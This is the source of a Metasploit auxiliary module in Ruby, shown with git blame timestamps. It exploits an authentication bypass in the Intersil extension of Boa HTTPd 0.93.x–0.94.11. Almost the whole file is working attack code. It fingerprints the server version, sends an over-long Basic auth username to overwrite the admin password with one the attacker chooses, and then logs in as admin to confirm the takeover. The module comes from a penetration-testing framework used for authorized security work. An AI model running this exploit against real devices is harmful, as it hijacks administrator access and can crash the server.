metasploit-framework/modules/auxiliary/admin/http/intersil_pass_reset.rb

111 lines
3.4 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
'Description' => %q{
The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
allows basic authentication bypass when the user string is greater
than 127 bytes long. The long string causes the password to be
overwritten in memory, which enables the attacker to reset the
password. In addition, the malicious attempt also may cause a
denial-of-service condition.
Please note that you must set the request URI to the directory that
requires basic authentication in order to work properly.
},
'Author' =>
[
'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '25676'],
[ 'PACKETSTORM', '59347']
2013-08-30 21:28:54 +00:00
],
'DisclosureDate' => 'Sep 10 2007'))
register_options(
[
OptString.new('TARGETURI', [ true, "The request URI", '/']),
OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
])
2013-08-30 21:28:54 +00:00
end
def check
begin
res = send_request_cgi({
'uri'=>'/',
'method'=>'GET'
})
if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
2016-02-01 22:06:34 +00:00
vprint_status("Boa Version Detected: #{m[1]}")
2013-08-30 21:28:54 +00:00
return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
return Exploit::CheckCode::Vulnerable
else
2016-02-01 22:06:34 +00:00
vprint_status("Not a Boa Server!")
2013-08-30 21:28:54 +00:00
return Exploit::CheckCode::Safe # not a boa server
end
rescue Rex::ConnectionRefused
2016-02-01 22:06:34 +00:00
print_error("Connection refused by server.")
2013-08-30 21:28:54 +00:00
return Exploit::CheckCode::Safe
end
end
def run
return if check != Exploit::CheckCode::Vulnerable
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'uri'=> uri,
'method'=>'GET',
'authorization' => basic_auth(Rex::Text.rand_text_alpha(127),datastore['PASSWORD'])
})
if res.nil?
2016-02-01 22:06:34 +00:00
print_error("The server may be down")
2013-08-30 21:28:54 +00:00
return
elsif res and res.code != 401
2016-02-01 22:06:34 +00:00
print_status("#{uri} does not have basic authentication enabled")
2013-08-30 21:28:54 +00:00
return
end
2016-02-01 22:06:34 +00:00
print_status("Server still operational. Checking to see if password has been overwritten")
2013-08-30 21:28:54 +00:00
res = send_request_cgi({
'uri' => uri,
'method'=> 'GET',
'authorization' => basic_auth('admin', datastore['PASSWORD'])
})
if not res
2016-02-01 22:06:34 +00:00
print_error("Server timedout, will not continue")
2013-08-30 21:28:54 +00:00
return
end
case res.code
when 200
2016-02-01 22:06:34 +00:00
print_good("Password reset successful with admin:#{datastore['PASSWORD']}")
2013-08-30 21:28:54 +00:00
when 401
2016-02-01 22:06:34 +00:00
print_error("Access forbidden. The password reset attempt did not work")
2013-08-30 21:28:54 +00:00
else
2016-02-01 22:06:34 +00:00
print_status("Unexpected response: Code #{res.code} encountered")
2013-08-30 21:28:54 +00:00
end
end
end